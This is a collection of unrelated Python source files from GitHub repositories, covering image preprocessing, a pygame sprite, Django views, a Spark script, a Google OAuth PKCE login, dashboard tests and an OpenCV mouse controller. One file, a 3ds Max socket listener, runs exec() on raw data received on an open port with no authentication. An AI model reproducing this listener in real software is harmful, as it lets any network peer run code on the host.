if the input data block is too small, pad it with the\n provided fill value\n \"\"\"\n # validate that center is in data\n for idx, (limit, coord) in enumerate(zip(data.shape, center)):\n assert 0 <= coord < limit, dict(\n idx=idx,\n limit=limit,\n coord=coord,\n data_shape=data.shape,\n center=center\n )\n corner = [c - size // 2 for c, size in zip(center, shape)]\n return get_block_with_corner_and_shape(data=data,\n corner=corner,\n shape=shape,\n fill_value=fill_value)\n\n\ndef take_center_block(data, shape, fill_value=0):\n \"\"\"\n takes the center block of the given data block, with the given shape\n \"\"\"\n if data.shape == tuple(shape):\n return data\n center = tuple([s // 2 for s in data.shape])\n return get_block_with_center_and_shape(data,\n center=center,\n shape=shape,\n fill_value=fill_value)\n\n\ndef rescale(data, zoom_factor):\n \"\"\"\n Up or down sample by a given factor\n \"\"\"\n return ndimage.interpolation.zoom(input=data, zoom=zoom_factor)\n\n\ndef _rotate(data, radians, axes, reshape, mode):\n return ndimage.rotate(input=data,\n angle=math.degrees(radians),\n axes=axes,\n mode=mode,\n reshape=reshape)\n\n\ndef rotate(data, radians, axes=(1, 0), mode=\"reflect\"):\n \"\"\"\n rotates around the center and returns an image of the same size as the\n input image - this means that some amount of the input image is\n excluded (the corners)\n\n Parameters\n ----------\n data : ndarray\n\n radians : int\n number of radians to rotate the data\n\n axes : tuple of integers (default=(1, 0))\n pair that specifies which axes to rotate over\n \"\"\"\n return _rotate(data, radians, axes, False, mode)\n\n\ndef rotate_take_center(data, radians, shape, axes=(1, 0), mode=\"reflect\"):\n \"\"\"\n rotates around the center and returns an image of the given size from\n the center of the rotated image\n\n Parameters\n ----------\n data : ndarray\n\n radians : int\n number of radians to rotate the data\n\n shape : tuple of integers\n desired shape of the output data\n\n axes : tuple of integers (default=(1, 0))\n pair that specifies which axes to rotate over\n \"\"\"\n rotated = _rotate(data, radians, axes, True, mode)\n return take_center_block(rotated, shape)\n\n\ndef rotate_multi(data, rotations, mode=\"reflect\"):\n \"\"\"\n perform multiple rotations in a row, 1 for each pair of axes\n\n rotations:\n a map from the indexes of the axes to rotate over to radians to rotate\n eg. {(1, 0): 0.1, (2, 0): 0.2}\n\n TODO:\n Seems like this should be done with a single affine transform. Can just\n create rotation matrices for each rotation you want, then multiply those\n together and apply the result. 
For 3d images, would be nice to not\n reprocess multiple times.\n \"\"\"\n tmp = data\n for axes, radians in rotations.items():\n tmp = rotate(tmp, radians, axes, mode=mode)\n return tmp\n\n\ndef strided_downsample(data, downsample_factors, offsets=0):\n \"\"\"\n downsamples an image by taking every few pixels (pros: very fast, cons:\n low quality / might lead to aliasing)\n\n downsample_factors:\n int or tuple/list of factors to downsample by in each dimension\n\n offsets:\n int or tuple/list of offset locations for where downsampling begins from\n \"\"\"\n if isinstance(downsample_factors, int):\n downsample_factors = (downsample_factors,) * len(data.shape)\n if isinstance(offsets, int):\n offsets = (offsets,) * len(data.shape)\n return data[tuple([slice(offset, None, stride)\n for offset, stride in zip(offsets, downsample_factors)])]\n\n\ndef resize_antialias(img, shape):\n \"\"\"\n resizes an image in a way to reduce the effect of aliasing\n\n NOTE: doesn't seem to work when img has channels\n\n img:\n img must be of type float32 or float64, and returns an image of type\n float32\n \"\"\"\n return np.array(PIL.Image.fromarray(img).resize(shape,\n PIL.Image.ANTIALIAS))\n","repo_name":"diogo149/du","sub_path":"du/preprocessing/image.py","file_name":"image.py","file_ext":"py","file_size_in_byte":6070,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"3392667658","text":"import pygame\nfrom settings import *\n\n\nclass Bullet(pygame.sprite.Sprite):\n def __init__(self, x, y, angle, vector):\n super().__init__()\n self.image = pygame.image.load('data/Bullet.png').convert_alpha()\n self.rect = self.image.get_rect(midleft=(x, y))\n self.image = pygame.transform.rotate(self.image, angle)\n self.speed = 30\n self.direction = vector.normalize()\n\n def update(self):\n self.rect.center += self.direction * self.speed\n if self.rect.centerx > WIDTH or self.rect.centerx < 0 or self.rect.centery > HEIGHT or self.rect.centery < 0:\n self.kill()\n","repo_name":"Boussenard/Gunner_game","sub_path":"code/bullet.py","file_name":"bullet.py","file_ext":"py","file_size_in_byte":630,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"18478827699","text":"from django.contrib.auth.decorators import login_required\nfrom django.db.models import Q\nfrom django.http import HttpResponse, HttpResponseRedirect\nfrom django.shortcuts import render, get_object_or_404\nfrom .models import Lots\nfrom artists.models import Artist\nfrom .forms import LotsForm\nimport json\n\n@login_required\ndef lots_list(request):\n lots = Lots.objects.all()\n context = {'items': lots}\n return render(request, 'lots_list.html', context)\n\n\n@login_required\ndef create_lot(request):\n form = LotsForm(request.POST or None)\n if form.is_valid():\n us = request.user\n obj = form.save(commit=False)\n obj.created_by = us\n form.save()\n form = LotsForm()\n return render(request, 'create_lots.html', {'form': form})\n\n@login_required\ndef update_lot(request, slug):\n instance = get_object_or_404(Lots, slug=slug)\n form = LotsForm(request.POST or None, instance=instance, initial={'artist_display': instance.artist})\n # form = LotsForm(initial={'artist_display': ar}, instance=instance)\n if form.is_valid():\n us = request.user\n obj = form.save(commit=False)\n # artist_name = form.cleaned_data[\"artist\"]\n # obj.artist, created = Artist.objects.get_or_create(name=artist_name)\n obj.modified_by = us\n form.save()\n return 
render(request, 'lots_list.html', {})\n return render(request, 'lots_update.html', {'form': form})\n\n\n@login_required\ndef artist_auto_complete(request):\n q = request.GET.get('term', '')\n # users = User.objects.filter(is_active=True)\n users = Artist.objects.filter(Q(name__icontains=q) | Q(bio__icontains=q))\n users_list = []\n\n for u in users:\n value = '%s, %s' % (u.name, u.bio)\n u_dict = {'id': u.id, 'label': value, 'value': value}\n users_list.append(u_dict)\n data = json.dumps(users_list)\n mimetype = 'application/json'\n return HttpResponse(data, mimetype)\n\n@login_required\ndef detail_lot(request, slug):\n q = Lots.objects.filter(slug__iexact=slug)\n if q.exists():\n q = q.first()\n else:\n return HttpResponse('Post Not Found')\n context = {\n 'post': q,\n }\n return render(request, 'lot_detail.html', context)\n","repo_name":"godjira-homless/artplein","sub_path":"lots/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2226,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}{"seq_id":"69905089194","text":"def middle_class(n, x, input_array):\n input_array.sort()\n current_sum = total_rich = 0\n for i in range(n-1, -1, -1):\n current_sum += input_array[i]\n current_avg = float(current_sum) / float(n - i)\n if current_avg >= x:\n total_rich += 1\n else:\n break\n return total_rich\n\n\nif __name__ == \"__main__\":\n t = int(input())\n results = list()\n for i in range(0, t):\n n, x = map(int, input().split(\" \"))\n input_array = list(map(int, input().split(\" \")))\n results.append(middle_class(n, x, input_array))\n for result in results:\n print(result)","repo_name":"I-Atlas/learning","sub_path":"src/Python/Codeforces/1334B.py","file_name":"1334B.py","file_ext":"py","file_size_in_byte":633,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"}{"seq_id":"34148588977","text":"\"\"\"\nListens for network communication from MaxScript.\n\nFrom:\n\thttp://techarttiki.blogspot.com/2009/12/maxscript-dotnet-sockets-with-python.html\n\nThanks to all who posted in the \"dotNet + MXS\" thread on CGTalk.\n\thttp://forums.cgsociety.org/showthread.php?f=98&t=551473\nThe info there put me on the right trail to making this work.\n\nAdam Pletcher, Technical Art Director, Volition/THQ\n\tadam.pletcher@gmail.com\n\thttp://techarttiki.blogspot.com\n\thttp://www.volition-inc.com\n\"\"\"\n\nimport wx\nimport wx.lib.newevent\n\nimport socket\nimport threading\n\nclass Socket_Listen_Thread( threading.Thread ):\n\t\"\"\"\n\tCreates a socket listener on a separate thread. Useful for listening for updates in\n\ta wx tool, leaving it free in the main loop to process the UI main loop.\n\n\t*Arguments:*\n\t\t* ``window``\t\tThe window object for the tool. Typically this is the frame, or \"self\".\n\t\t* ``event_class``\tThe class of the custom wx event to post when a socket update is received.\n\n\t*Keyword Arguments:*\n\t\t* ``port``\t\t\tTCP/IP port to listen on.\n\t\t* ``buffer_size``\tSize of data buffer to read from socket. Generally you want this to be\n\t\t\t\t\t\t\t\ta power of two, larger than the largest data message you'll receive.\n\t\"\"\"\n\tdef __init__( self, port = 5432, buffer_size = 512 ):\n\t\tthreading.Thread.__init__( self )\n\n\t\t# Window to post event to later\n\t\t# self.window = window\n\t\t# self.event_class = event_class\n\t\tself.buffer_size = buffer_size\n\t\tself.data_ = \"\"\n\n\t\t# Set up our socket\n\t\tself.socket = socket.socket( socket.AF_INET, socket.SOCK_STREAM )\n\t\tself.socket.bind( ( '', port ) )\n\t\tself.socket.listen( 5 )\n\t\tself.socket.setblocking( False )\n\n\t\tself.running = False\n\n\tdef run( self ):\n\t\tself.running = True\n\n\t\twhile ( self.running ):\n\t\t\t# Starting server...\n\t\t\t# Listen for connection. We're in non-blocking mode so it can\n\t\t\t# check for the signal to shut down from the main thread.\n\t\t\ttry:\n\t\t\t\tclient_socket, clientaddr = self.socket.accept( )\n\t\t\t\tdata_received = True\n\t\t\texcept socket.error:\n\t\t\t\tdata_received = False\n\n\t\t\tif ( data_received ):\n\t\t\t\t# Set new client socket to block. 
Otherwise it will inherit\n\t\t\t\t# the non-blocking mode of the server socket.\n\t\t\t\tclient_socket.setblocking( True )\n\n\t\t\t\t# Connection found, read its data then close\n\t\t\t\tdata = client_socket.recv( self.buffer_size )\n\t\t\t\tclient_socket.close( )\n\n\t\t\t\t# Create wx event and post it to our app window\n\t\t\t\t# event = self.event_class( data = data )\n\t\t\t\t# wx.PostEvent( self.window, event )\n\t\t\t\t# self.data_ = data\n\t\t\t\t# print data\n\t\t\t\texec(data)\n\n\n\tdef stop( self ):\n\t\tself.running = False\n\n\t\tif ( self.socket ):\n\t\t\tself.socket.close( )\n\n\n# class Tool_Frame( wx.Frame ):\n# \t\"\"\"\n# \t\"\"\"\n# \tdef __init__( self, parent, title ):\n# \t\twx.Frame.__init__( self, parent, -1, title, pos=(150, 150), size=(350, 100) )\n# \t\tself.SetBackgroundColour( ( 200,200,200 ) )\n\n# \t\t# Create a new Event class and a EVT binder function\n# \t\t( Max_Update_Event, EVT_3DS_MAX_UPDATE ) = wx.lib.newevent.NewEvent( )\n\n# \t\t# CONTROLS\n# \t\tself.st_text1\t\t= wx.StaticText( self, -1, \"Selected Objects:\" )\n# \t\tself.tc_obj_names = wx.TextCtrl( self, -1, '', size=(300, -1) )\n\n# \t\tself.main_sizer = wx.BoxSizer( wx.VERTICAL )\n\n# \t\tself.main_sizer.Add( self.st_text1, 0, wx.ALL, 5 )\n# \t\tself.main_sizer.Add( self.tc_obj_names, 0, wx.ALL, 5 )\n\n# \t\t# Create instance of our listener thread, and start it running\n# \t\tself.max_monitor = Socket_Listen_Thread( self, Max_Update_Event )\n# \t\tself.max_monitor.start( )\n\n# \t\t# EVENT BINDINGS\n# \t\tself.Bind( wx.EVT_CLOSE, self.on_close )\n\n# \t\t# Bind handler to our custom event\n# \t\tself.Bind( EVT_3DS_MAX_UPDATE, self.on_3ds_max_update )\n\n# \t\t# FINAL SETUP\n# \t\tself.SetSizer( self.main_sizer )\n# \t\tself.Layout( )\n\n# \tdef on_3ds_max_update( self, event ):\n# \t\t\"\"\"\n# \t\tEvent handler for our custom Max_Update_Event, setting the text control's\n# \t\tvalue to the data received. 
Which in this case is a string containing the names\n# \t\tof the objects selected in 3ds Max.\n# \t\t\"\"\"\n# \t\tself.tc_obj_names.SetValue( event.data )\n\n# \tdef on_close( self, event ):\n# \t\t\"\"\"\n# \t\tTells the listener thread to stop, then unregisters the Max callback.\n# \t\t\"\"\"\n# \t\t# Stop the socket listening thread\n# \t\tself.max_monitor.stop( )\n\n# \t\tself.Destroy( )\n\n### MAIN ###\nif (__name__ == '__main__'):\n\t# wx_app = wx.App( redirect=False )\n\n\t# frame\t= Tool_Frame( None, 'Test Frame' )\n\n\t# frame.Show( True )\n\t# wx_app.MainLoop( )\n\n\ts = Socket_Listen_Thread()\n\ts.start()\n\t# s.stop()\n\n","repo_name":"nguyenvuducthuy/thuy_maxLibs","sub_path":"tcpSocket/python_listener.py","file_name":"python_listener.py","file_ext":"py","file_size_in_byte":4407,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"15161718759","text":"r,b = 0,0\nn = int(input())\nfor _ in range(n):\n s = input()\n for c in s:\n if c == 'R':\n r += 1\n elif c == 'B':\n b += 1\nif r == b:\n print('DRAW')\nelif r > b:\n print('TAKAHASHI')\nelse:\n print('AOKI')","repo_name":"Kawser-nerd/CLCDSA","sub_path":"Source Codes/AtCoder/arc040/A/4426412.py","file_name":"4426412.py","file_ext":"py","file_size_in_byte":247,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"72"} +{"seq_id":"12154578608","text":"import sys\nimport pandas as pd\nfrom pyspark.sql import SparkSession, functions, types\nfrom pyspark.sql.window import Window\nfrom pyspark.sql import DataFrameStatFunctions as statFunc\nfrom pyspark.sql.functions import col\n\n\nspark = SparkSession.builder.appName('extract interesting amenities').getOrCreate()\nspark.sparkContext.setLogLevel('WARN')\n\nassert sys.version_info >= (3, 5) # make sure we have Python 3.5+\nassert spark.version >= '2.3' # make sure we have Spark 2.3+\n\namenities_schema = types.StructType([\n types.StructField('lat', types.FloatType()),\n types.StructField('lon', types.FloatType()),\n types.StructField('timestamp', types.TimestampType()),\n types.StructField('amenity', types.StringType()),\n types.StructField('name', types.StringType()),\n # types.StructField('tags', types.ArrayType(types.StringType())), # not sure which of these works\n types.StructField('tags', types.MapType(types.StringType(), types.StringType()))\n])\n\ndef print_shape(dataframe):\n print(\"(\" + str(dataframe.count()) + \", \" + str(len(dataframe.columns)) + \")\")\n \n \ndef extract_wikidata_id(tags):\n # Input: tags field of amenities\n if tags == {}:\n return None\n for tag in tags:\n if \"wikidata\" in tag:\n return tags[tag]\n return None\n\ndef main(in_directory):\n # Load data\n amenities = spark.read.json(in_directory, schema=amenities_schema)\n print(\"amenities:\")\n print_shape(amenities)\n amenities.show()\n \n extract_wiki_tag_udf = functions.udf(lambda x:extract_wikidata_id(x), returnType=types.StringType())\n amenities = amenities.withColumn(\"wikidata_id\", extract_wiki_tag_udf(amenities.tags))\n # print_shape(amenities)\n # amenities.show()\n \n amenities = amenities.na.drop()\n # print_shape(amenities)\n # amenities.show()\n \n unique_wikidata_ids = amenities.groupBy('wikidata_id').count()\n print(\"unique_wiki_id:\")\n print_shape(unique_wikidata_ids)\n unique_wikidata_ids.show()\n \n threshold = 150;\n filtered_based_on_percentile = unique_wikidata_ids.filter(col(\"count\")>=threshold)\n # filtered_based_on_percentile = 
unique_wikidata_ids.groupb(\"percent_rank\", functions.percent_rank())\n filtered_based_on_percentile = filtered_based_on_percentile.sort(col(\"count\").desc());\n filtered_based_on_percentile = filtered_based_on_percentile.withColumnRenamed('wikidata_id','filtered_id')\n # print_shape(filtered_based_on_percentile)\n # filtered_based_on_percentile.show()\n \n join_data = amenities.join(filtered_based_on_percentile, amenities.wikidata_id == filtered_based_on_percentile.filtered_id).select('lat', 'lon', 'amenity', 'name', 'count', 'wikidata_id')\n print(\"vancouver_interesting_things:\")\n print_shape(join_data)\n join_data.show()\n \n # name = amenities.groupBy('name').count()\n # print_shape(name)\n # name.show()\n \n # print_shape(amenities)\n # amenities.show()\n \n # unique_wikidata_ids = unique_wikidata_ids.na.drop()\n # # unique_wikidata_ids = unique_wikidata_ids.drop('count')\n # unique_wikidata_ids = unique_wikidata_ids.withColumnRenamed('count', 'wikidata_occurrences')\n \n # # Get list of unique amenity names\n # amenities_only = amenities.select(amenities.columns[3])\n # print(\"amenities_only:\")\n # print_shape(amenities_only)\n # amenities_only.show()\n\n # unique_amenities = amenities_only.dropDuplicates()\n # print(\"unique_amenities:\")\n # print_shape(unique_amenities)\n # unique_amenities.show()\n\n # This list of values is in the 100s so safe to coalesce\n join_data.toPandas().to_csv(\"vancouver-interesting-things.csv\")\n\nif __name__=='__main__':\n in_directory = sys.argv[1]\n main(in_directory)","repo_name":"rcmcg/CMPT353-Data-Science","sub_path":"get_interesting_things.py","file_name":"get_interesting_things.py","file_ext":"py","file_size_in_byte":3731,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"38494300121","text":"from typing import Dict, List\n\nclass Request:\n def __init__(self):\n self.address: str = \"\"\n self.method: str = \"\"\n self.headers: Dict[str, str] = {}\n self.body: str = \"\"\n\n def load_header(self, raw: str) -> None:\n req = raw.split(\"\\r\\n\")\n spl = req[0].split(\" \")\n self.method = spl[0]\n self.address = spl[1]\n\n headers = [n for n in req[1:] if n != '']\n for h in headers:\n hr = h.split(\":\", 1)\n self.headers[hr[0].lower()] = hr[1]\n\n def load_body(self, raw: str) -> None:\n self.body = raw.split(\"=\")[1] if raw else \"\"\n\n @property\n def headers_list(self) -> List[str]:\n ret: List[str] = []\n for i in self.headers:\n ret += [f\"{i}: {self.headers[i]}\"]\n return ret\n","repo_name":"anggar/progjar","sub_path":"tugas8/req.py","file_name":"req.py","file_ext":"py","file_size_in_byte":823,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"39149484409","text":"from http.server import BaseHTTPRequestHandler, HTTPServer\r\nfrom urllib.parse import urlparse, parse_qs, quote_plus\r\nimport webbrowser\r\nimport requests\r\nimport sys\r\nimport json\r\nimport jwt\r\nimport secrets\r\nimport base64\r\nimport hashlib\r\n\r\n# Begin Configuration\r\nclient_id =\"PUT YOUR CLIENT ID HERE\"\r\nclient_secret= \"PUT YOUR CLIENT SECRET HERE\"\r\nauth_uri = \"https://accounts.google.com/o/oauth2/v2/auth\"\r\ntoken_uri = \"https://oauth2.googleapis.com/token\"\r\nredirect_uri = \"http://localhost:8000\"\r\n# End Configuration\r\n\r\nclass AccessCodeHandler(BaseHTTPRequestHandler):\r\n def do_GET(self):\r\n global access_code\r\n query = parse_qs(urlparse (self.path).query)\r\n code = query.get('code', None)\r\n if code 
!= None:\r\n access_code = code[0]\r\n self.send_response(200)\r\n self.send_header(\"Content-type\", \"text/html\")\r\n self.end_headers()\r\n self.wfile.write(bytes(\"Python3 OAuth by controlthings.gr\", \"utf-8\"))\r\n self.wfile.write(bytes(\"\", \"utf-8\"))\r\n self.wfile.write(bytes(\"You can now close the browser and return to the application.\", \"utf-8\"))\r\n self.wfile.write(bytes(\"\", \"utf-8\"))\r\n\r\naccess_code = \"\"\r\ncode_verifier = secrets.token_urlsafe(64) #PKCE code verifier, must be > 32 bytes for google, it must also be < 128 characters\r\ncode_challenge = base64.urlsafe_b64encode(hashlib.sha256(code_verifier.encode()).digest()).decode().rstrip(\"=\")\r\nredirect_uri_urlencoded = quote_plus(redirect_uri )\r\n_authorization_url = f\"\"\"{auth_uri}?\r\nresponse_type=code&\r\nclient_id={client_id}&\r\nscope=openid%20email&\r\nredirect_uri={redirect_uri_urlencoded}&\r\ncode_challenge={code_challenge}&\r\ncode_challenge_method=S256\r\n\"\"\".replace(\"\\n\", \"\")\r\n\r\nprint(\"...Opening browser\")\r\nwebbrowser.open(_authorization_url)\r\nprint(\"...Running server to receive access code\")\r\nhttpd = HTTPServer(('127.0.0.1', 8000), AccessCodeHandler)\r\nhttpd.handle_request()\r\nprint(access_code)\r\nif (access_code == \"\"):\r\n print(\"Code was not received. Inspect errors in the output\")\r\n sys.exit()\r\n\r\nprint(\"...Requesting token\")\r\n_token_post_data = {\r\n 'code': access_code,\r\n 'client_id': client_id,\r\n 'client_secret':client_secret,\r\n 'redirect_uri':redirect_uri,\r\n 'grant_type':'authorization_code',\r\n 'code_verifier':code_verifier\r\n}\r\n\r\ntoken_response = requests.post(token_uri, data=_token_post_data)\r\n#assuming correct response\r\ntoken_response_json = json.loads(token_response.text)\r\nid_token = jwt.decode(token_response_json['id_token'], options={\"verify_signature\": False}) # It came directly from google, no need to verify signature https://developers.google.com/identity/openid-connect/openid-connect#obtainuserinfo\r\nprint(id_token)\r\n\r\n","repo_name":"controlthingsopensource/google-openidc","sub_path":"google-openidc.py","file_name":"google-openidc.py","file_ext":"py","file_size_in_byte":2713,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}{"seq_id":"7549777337","text":"import os\nimport pickle\nimport unittest\n\nfrom bokeh.io import output_file, show\nfrom bokeh.layouts import layout\nfrom bokeh.models import Div, Plot, Scatter, Label\nfrom bokeh.plotting import save, figure\n\nimport gt7dashboard.gt7diagrams\nimport gt7dashboard.gt7helper\nfrom gt7dashboard import gt7diagrams, gt7helper\nfrom gt7dashboard.gt7diagrams import (\n get_throttle_braking_race_line_diagram,\n)\nfrom gt7dashboard.gt7lap import Lap\n\n\nclass TestHelper(unittest.TestCase):\n def setUp(self) -> None:\n self.path = os.path.join(\n os.getcwd(), \"test_data\", \"brands_hatch_10_laps.laps\"\n )\n with open(self.path, \"rb\") as f:\n self.test_laps = pickle.load(f)\n\n def test_get_throttle_braking_race_line_diagram(self):\n (\n race_line,\n throttle_line_data,\n breaking_line_data,\n coasting_line_data,\n reference_throttle_line_data,\n reference_breaking_line_data,\n reference_coasting_line_data,\n ) = get_throttle_braking_race_line_diagram()\n\n reference_lap = self.test_laps[0]\n last_lap = self.test_laps[1]\n\n lap_data = last_lap.get_data_dict()\n reference_lap_data = reference_lap.get_data_dict()\n\n throttle_line_data.data_source.data = lap_data\n breaking_line_data.data_source.data = lap_data\n coasting_line_data.data_source.data = lap_data\n\n reference_throttle_line_data.data_source.data = reference_lap_data\n reference_breaking_line_data.data_source.data = reference_lap_data\n reference_coasting_line_data.data_source.data = reference_lap_data\n\n gt7diagrams.add_annotations_to_race_line(race_line, last_lap, 
reference_lap)\n\n out_file = \"test_out/test_get_throttle_braking_race_line_diagram.html\"\n output_file(out_file)\n save(race_line)\n print(\"View file for reference at %s\" % out_file)\n\n # get file size, should be about 3.5MB\n file_size = os.path.getsize(out_file)\n self.assertAlmostEqual(file_size, 4500000, delta=1000000)\n\n def helper_get_race_diagram(self):\n rd = gt7diagrams.RaceDiagram(600)\n\n lap_data_1 = self.test_laps[0].get_data_dict()\n lap_data_2 = self.test_laps[1].get_data_dict()\n\n median_lap_data = gt7helper.get_median_lap(self.test_laps).get_data_dict()\n\n rd.source_time_diff.data = gt7helper.calculate_time_diff_by_distance(\n self.test_laps[0], self.test_laps[1]\n )\n rd.source_last_lap.data = lap_data_2\n rd.source_reference_lap.data = lap_data_1\n rd.source_median_lap.data = median_lap_data\n\n return rd\n\n def test_race_diagram(self):\n\n rd = self.helper_get_race_diagram()\n\n out_file = \"test_out/test_race_diagram.html\"\n print(\"View file for reference at %s\" % out_file)\n output_file(out_file)\n save(rd.get_layout())\n\n # get file size, should be about 5MB\n file_size = os.path.getsize(out_file)\n self.assertAlmostEqual(file_size, 2500000, delta=1000000)\n\n def test_add_5_additional_laps_to_race_diagram(self):\n\n rd = self.helper_get_race_diagram()\n\n # Add a random new lap to the mix\n # TODO Unfortunately, we have only 2 to pick from. Maybe improve this later\n gray_lap_source = rd.add_additional_lap_to_race_diagram(\"gray\", self.test_laps[1], True)\n\n # Should now contain 1 source\n self.assertEqual(1, len(rd.sources_additional_laps))\n\n out_file = \"test_out/test_add_5_additional_laps_to_race_diagram_with_additional_lap.html\"\n print(\"View file for reference at %s\" % out_file)\n output_file(out_file)\n save(rd.get_layout())\n\n rd.delete_all_additional_laps()\n self.assertEqual(0, len(rd.sources_additional_laps))\n\n out_file = \"test_out/test_add_5_additional_laps_to_race_diagram_without_additional_lap.html\"\n print(\"View file for reference at %s\" % out_file)\n output_file(out_file)\n save(rd.get_layout())\n\n # get file size, should be about 5MB\n file_size = os.path.getsize(out_file)\n self.assertAlmostEqual(file_size, 2600000, delta=1000000)\n\n with open(out_file, 'r') as fp:\n data = fp.read()\n self.assertNotIn(\"1:28.465\", data)\n\n\n def test_get_fuel_map_html_table(self):\n d = Div()\n lap = Lap()\n lap.fuel_at_start = 100\n lap.fuel_at_end = 80\n lap.lap_finish_time = 90 * 1000\n\n fuel_map_html_table = gt7diagrams.get_fuel_map_html_table(lap)\n d.text = fuel_map_html_table\n out_file = \"test_out/test_get_fuel_map_html_table.html\"\n output_file(out_file)\n save(d)\n print(\"View file for reference at %s\" % out_file)\n\n def test_get_fuel_map_html_table_negative_fuel_consumption(self):\n d = Div()\n lap = Lap()\n lap.fuel_at_start = 0\n lap.fuel_at_end = 100\n lap.lap_finish_time = 90 * 1000\n\n fuel_map_html_table = gt7diagrams.get_fuel_map_html_table(lap)\n d.text = fuel_map_html_table\n out_file = \"test_out/test_get_fuel_map_html_table_negative_fuel_consumption.html\"\n output_file(out_file)\n save(d)\n print(\"View file for reference at %s\" % out_file)\n\n with open(out_file, 'r') as fp:\n data = fp.read()\n self.assertIn(\"No Fuel\", data)\n\n def test_get_fuel_map_html_table_with_no_consumption(self):\n d = Div()\n fuel_map_html_table = gt7diagrams.get_fuel_map_html_table(self.test_laps[0])\n d.text = fuel_map_html_table\n out_file = \"test_out/test_get_fuel_map_html_table_with_no_consumption.html\"\n 
output_file(out_file)\n save(d)\n print(\"View file for reference at %s\" % out_file)\n\n\n def test_race_table(self):\n rt = gt7diagrams.RaceTimeTable()\n rt.show_laps(self.test_laps)\n\n out_file = \"test_out/test_race_table.html\"\n output_file(out_file)\n save(rt.t_lap_times)\n\n def test_display_variance(self):\n rd = self.helper_get_race_diagram()\n rd.update_fastest_laps_variance(self.test_laps)\n\n out_file = \"test_out/test_get_last_variance.html\"\n print(\"View file for reference at %s\" % out_file)\n output_file(out_file)\n save(rd.get_layout())\n\n # get file size, should be about 5MB\n file_size = os.path.getsize(out_file)\n self.assertAlmostEqual(file_size, 3000000, delta=1000000)\n\n def test_display_flat_line_variance(self):\n rd = self.helper_get_race_diagram()\n # three times the same lap should result in a flat line\n rd.update_fastest_laps_variance([self.test_laps[0], self.test_laps[0], self.test_laps[0]])\n\n out_file = \"test_out/test_display_flat_line_variance.html\"\n print(\"View file for reference at %s\" % out_file)\n output_file(out_file)\n save(layout(rd.f_speed_variance))\n\n # get file size, should be about 5MB\n file_size = os.path.getsize(out_file)\n self.assertAlmostEqual(file_size, 140000, delta=1000000)\n\n def test_get_speed_peak_and_valley_diagram_different_size(self):\n last_lap = self.test_laps[0]\n reference_lap = self.test_laps[5]\n div = Div()\n div.text = gt7diagrams.get_speed_peak_and_valley_diagram(last_lap, reference_lap)\n\n out_file = \"test_out/test_get_speed_peak_and_valley_diagram_different_size.html\"\n print(\"View file for reference at %s\" % out_file)\n output_file(out_file)\n save(layout(div))\n\n def test_get_speed_peak_and_valley_diagram_same_size(self):\n last_lap = self.test_laps[2]\n reference_lap = self.test_laps[3]\n div = Div()\n div.text = gt7diagrams.get_speed_peak_and_valley_diagram(last_lap, reference_lap)\n\n out_file = \"test_out/test_get_speed_peak_and_valley_diagram_same_size.html\"\n print(\"View file for reference at %s\" % out_file)\n output_file(out_file)\n save(layout(div))\n","repo_name":"snipem/gt7dashboard","sub_path":"gt7dashboard/test/test_gt7diagrams.py","file_name":"test_gt7diagrams.py","file_ext":"py","file_size_in_byte":8014,"program_lang":"python","lang":"en","doc_type":"code","stars":111,"dataset":"github-code","pt":"72"} +{"seq_id":"28345040404","text":"import wx\nimport cv2\nimport numpy as np\nimport time\nfrom pynput.mouse import Button,Controller\n\n\n\ncam=cv2.VideoCapture(0)\n#yellow\nlower=np.array([20,100,100])\nupper=np.array([30,255,255])\n#blue\n#lower=np.array([110,50,50])\n#upper=np.array([130,255,255])\nkernalOpen=np.ones((5,5))\nkernalClose=np.ones((20,20))\n\n\nmouse=Controller()\napp=wx.App(False)\n(sx,sy)=wx.GetDisplaySize()\n(camx,camy)=(480,320)\n\nhold=False\nfirstClick=False\nstart=0\nend=-10\n\nwhile True:\n ret,img=cam.read()\n img=cv2.resize(img,(camx,camy))\n img_hsv=cv2.cvtColor(img,cv2.COLOR_BGR2HSV)\n mask=cv2.inRange(img_hsv,lower,upper)\n maskOpen=cv2.morphologyEx(mask,cv2.MORPH_OPEN,kernalOpen)\n maskClose=cv2.morphologyEx(maskOpen,cv2.MORPH_CLOSE,kernalClose)\n maskFinal=maskClose\n #cv2.imshow('hsv',img_hsv)\n conts,h=cv2.findContours(maskFinal.copy(),cv2.RETR_EXTERNAL,cv2.CHAIN_APPROX_NONE)\n sconts=[c for c in conts if cv2.contourArea(c)>=500]\n n=len(sconts)\n if n==2:\n # for move mouse pointer\n firstClick=True\n x1,y1,w1,h1=cv2.boundingRect(sconts[0])\n x2,y2,w2,h2=cv2.boundingRect(sconts[1])\n # drawing rectangle over the objects\n 
